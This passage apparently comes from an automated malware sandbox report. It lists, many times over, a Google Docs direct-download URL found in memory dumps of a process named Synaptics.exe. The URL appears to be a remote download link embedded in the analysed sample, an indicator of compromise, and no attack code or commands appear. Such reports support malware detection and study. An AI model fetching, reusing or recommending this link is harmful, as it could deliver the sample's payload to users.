0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download...
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..f
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download..l
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.1K
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.7
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c?a
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.com.$
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gvt2
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 0000000A.00000002.2870734716.0000000018B3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2921916094.0000000026FBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download00pZl
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download15
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.000000000084D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2024
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download25920
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download30#
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3Rc
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3W:
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3b
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4Q
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4m
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047367326.000000000575E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download57
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5A
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5D
                              Source: Synaptics.exe, 0000000A.00000002.2927765707.0000000029DFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download69
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7)#YA
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7c
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7j
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7rMY/
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download87x
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9F(X1
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2874692975.000000001B0BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:)(YB
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2896383994.000000001D8DB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;QkXB
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;U
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;b
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;rep
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=2
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=G$Y$
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=z$
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?(
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?(iY1
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?V&Z
                              Source: Synaptics.exe, 0000000A.00000002.2811128271.0000000005730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?i
                              Source: Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047221664.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 0000000A.00000002.2847387156.000000000F5FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAEP_;
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadActivD
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000071A5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2820637181.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D7B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBSEYZ
                              Source: Synaptics.exe, 0000000A.00000002.2890890608.000000001D736000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2811128271.00000000056F7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2851712170.000000000F7E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2805475098.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000003.2047511429.0000000005707000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC)WY=
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCH
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.00000000070C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCP
                              Source: Synaptics.exe, 0000000A.00000002.2843843804.000000000F482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCTjX.
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCalif
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCoZ
                              Source: Synaptics.exe, 0000000A.00000002.2820637181.000000000710C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCsyX
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2938070186.000000002E9BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2892404923.000000001D79E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 0000000A.00000002.2849014206.000000000F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD(RXT
                              Source: Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDJ
                              Source: Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDaX
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2845813815.000000000F535000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDe
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDe4
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000000A.00000002.2850549729.000000000F730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene
                              Source: Synaptics.exe, 0000000A.00000002.2887185524.000000001D648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDene#
